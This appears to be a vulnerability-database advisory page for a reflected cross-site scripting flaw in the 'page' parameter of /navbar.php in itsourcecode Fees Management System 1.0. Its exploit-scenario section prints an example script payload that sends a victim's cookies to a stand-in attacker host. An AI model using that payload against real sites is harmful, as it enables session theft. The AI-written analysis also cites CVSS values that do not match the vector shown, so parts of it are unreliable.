EUVD-2026-34261
GHSA-gx9q-vg44-8c2c
Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionCVE.org
A weakness has been identified in itsourcecode Fees Management System up to 1.0. Affected is an unknown function of the file /navbar.php. This manipulation of the argument page causes cross site scripting. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks.
AnalysisAI
Reflected cross-site scripting in itsourcecode Fees Management System 1.0 allows remote unauthenticated attackers to inject arbitrary JavaScript into a victim's browser session by manipulating the 'page' parameter in /navbar.php. The attack requires user interaction - a victim must follow a crafted URL - limiting mass exploitation, but publicly available exploit code (referenced via a GitHub issue) lowers the barrier for targeted phishing campaigns. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | The victim must be induced to click a specially crafted URL - exploitation is not possible without this user interaction (UI:R in CVSS vector), which limits automated or worm-style attacks. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS base score of 4.3 (Medium) reflects a network-accessible (AV:N), low-complexity (AC:L), unauthenticated (PR:N) attack that nonetheless requires user interaction (UI:R) and has limited impact (I:L integrity only, S:U scope unchanged, no confidentiality or availability impact). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker identifies a school or institution running the itsourcecode Fees Management System publicly, crafts a URL embedding a JavaScript payload in the 'page' parameter targeting /navbar.php (e.g., /navbar.php?page=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>), and delivers this link to a logged-in administrator or staff member via phishing email. When the victim clicks the link and their browser renders the unencoded parameter, the injected script executes in the context of the application's origin. … |
| Remediation | No vendor-released patch has been identified at time of analysis; the CVSS remediation level RL:X (Not Defined) corroborates the absence of an official fix. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
More from same product – last 7 days
Authentication bypass in Discuz! X5.0 releases 20260320 through 20260501 allows unauthenticated remote attackers to acce
Authenticated remote code execution in Discuz! X5.0 releases 20260320 through 20260501 allows administrators to chain a
Unauthenticated PHP Object Injection in the Happyforms WordPress plugin (versions <= 1.26.13) allows remote attackers to
Unauthenticated PHP Object Injection in the Broadcast Live Video WordPress plugin (versions prior to 7.1.3) allows remot
Unauthenticated PHP object injection in the WordPress plugin 'Integration for Keap/Infusionsoft and Contact Form 7, WPFo
Share
External POC / Exploit Code
Leaving vuln.today